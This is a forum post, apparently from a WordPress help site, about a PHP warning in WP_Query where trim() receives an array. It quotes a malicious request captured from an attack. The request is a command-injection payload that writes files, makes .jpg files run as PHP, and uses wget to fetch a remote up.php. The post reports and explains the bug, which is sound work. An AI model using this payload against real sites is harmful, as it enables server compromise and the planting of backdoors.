WordPress 4.9.5 PHP intermittent warning trim() expects parameter 1 to be string, array given

I ran into this today. It’s a bug. I filed a bug report here:

https://core.trac.wordpress.org/ticket/46797

The problem is this line of code:

$qv['name'] = trim( $qv['name'] );

Source: https://github.com/WordPress/wordpress-develop/blob/a0ca5afd8977b5a3857084d9cb1bd345166e2f21/src/wp-includes/class-wp-query.php#L764

A (malicious) user sends a request that looks like:

GET /?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=echo ‘Vuln!! patch it Now!’ > vuln.htm; echo ‘Vuln!!’> sites/default/files/vuln.php; echo ‘Vuln!!’> vuln.php; cd sites/default/files/; echo ‘AddType application/x-httpd-php .jpg’ > .htaccess; wget ‘http://40k.waszmann.de/Deutsch/images/up.php

Such a request makes $qv[‘name’] an array, not a string.

Needs to be sanitized.

Related Posts:

  1. ajax category filter
  2. Pagination custom query
  3. Order by two meta keys
  4. Warning: urlencode() expects parameter 1 to be string, array given
  5. Finding all results from database within 500 miles of the given latitude and longitude [closed]
  6. Function to check if author has posted within the last x days
  7. Shortcode returns escaped HTML tags
  8. Calling a custom excerpt function in a local loop
  9. How to get any tag ID
  10. Dynamically Override Fancy Title – Part II
  11. query posts in functions.php and update a field
  12. Get posts using WP_Query
  13. Finding post content that begins with a specific character
  14. Best practice custom function, where to echo the variables?
  15. How to get user_id from wordpress database inside ajax function?
  16. Undefined property: WP_Query::$post
  17. posts_per_page not working
  18. Exclude admin from WP_Query Contributors
  19. Multiple Loops Inside a Function
  20. How to delete taxonomy term when a wordpress user is removed?
  21. Exclude category for main query and custom
  22. Display posts from only one post form in custom query and exclude in main query
  23. Category applied to pages, creates multiple breadcrumb entries after a search query (On the translated site)
  24. How to filter, restrict and return posts based on custom user meta information
  25. WP Query using tax_query & meta_query
  26. wordpress search word, “hello world” ===> ‘hello+world’ ===> ‘hello’, ‘world’
  27. Display most popular in the past two days
  28. meta_query not working as expected
  29. New WP_Query calls Pre_get_posts filter twice
  30. how to access query string in wordpress?
  31. Merge two search functions for custom post type
  32. Make a SQL query with wpdb in WordPress
  33. how to use pre_gets_posts to exclude one queried ID from homepage loop
  34. Error with function in functions.php?
  35. Exclude authors IDs from WP_Query
  36. Loading two different AJAX requests on two different pages
  37. Getting the post terms ‘wp_get_post_terms’ per post when within the functions.php file
  38. How to load a script code only in posts?
  39. Multiple meta_key ordering with pre_get_posts
  40. How do I fit WP_Query arguments into a function?
  41. Create a notification for post field
  42. Add URL Rewrite Rule To WordPress
  43. Trying to get property of non-object in: $wp_query
  44. WordPress dynamic AJAX query
  45. relation OR instead of AND – Filtered term ID’s in loop
  46. Error: Attempt to read property “ID” on null
  47. Pagination repeating posts on search results
  48. How to check if logged in user have pending custom post?
  49. Custom WordPress post query for displaying time-released content on website
  50. SEARCH QUERY PLEASE HELP | call_user_func_array() expects parameter 1 to be a valid callback php
  51. Custom query for custom post type not getting correct post ID
  52. Finding post ID dynamically on click
  53. how to move a page from one drop down menu to another drop down menu
  54. How to upload 3 attachments to current post?
  55. Global page ID variable empty error
  56. WP_Query & shortcode : Return 3 articles from a category WordPress
  57. Get post Number with local loop and template
  58. Save query in function for custom gallery
  59. Seach and categories not working when ignoring sticky posts in main loop
  60. Problem with custom WP_Query and underlying pagination/posts_per_page
  61. Calling a function with WP_Query only ever brings the first result
  62. What argument does my function need to echo get_results() query results
  63. Fetching $_POST from Page Template into functions.php
  64. Declare inline background image in functions.php
  65. I wan to process the following js to process the AJAX Request on my function to calculate author Total Post views
  66. Hiding all posts/products/pages from a site based on a custom taxonomy/domain name
  67. ordering and optimizing functions
  68. Why WP_Query in functions.php is not working when get_posts works?
  69. Adding css tweak based on page template
  70. WP_Query and DES sort for Custom Taxonomy based upon a meta field?
  71. How to write a query-function as a query-shortcode?
  72. 1500+ duplicate queries via get_option function (query monitor)
  73. Variations as Single Products [closed]
  74. Excluding a category from frontpage but not from WP_Query
  75. How to make WP_Query ‘post__in’ accept an array?
  76. get data from wp-query, outside the loop & without url change
  77. Querying by taxonomy vs Querying by Custom fields Speed Comparison
  78. Splitting the main query in multiple loops with query_posts and/or pre_get_posts?
  79. WP_Query mixe post and page attributes
  80. How do you Query posts with nothing in common?
  81. When to add_filter() to Custom Query
  82. if/else on custom query gives 200 OK when condition not met?
  83. Creating arguments from loop for WP_Query meta_query
  84. Can I set my WP_Query to be a Main Query?
  85. How to use external API content in place of WP posts using $wp_query?
  86. wp_query args adding muitiple tax_querys
  87. WP_Query posts with comments only
  88. Default permalink structure causing Notice: Undefined property: WP_Query::$post
  89. Get posts that do not have the same tags as current
  90. Expecting statement error from php loop using ACF plugin
  91. Get specific ACF key and value from all posts – no access to DB
  92. I am officially missing something about transient posts
  93. Register Taxonomy – What is `query_var`?
  94. Block internal search queries with pre_get_posts and regex rules
  95. Is it possible to give a classname to specific comments in the WordPress admin?
  96. How to make a wordpress loop file that displays posts based on certain conditions
  97. Custom loop – Isolating post meta output depending on current query taxonomy terms
  98. How do I display posts with specific value in a custom field into my loop?
  99. Order by multiple meta keys on wordpress
  100. Sort posts in dashboard using custom field; also include posts where field isn’t set

Leave a Comment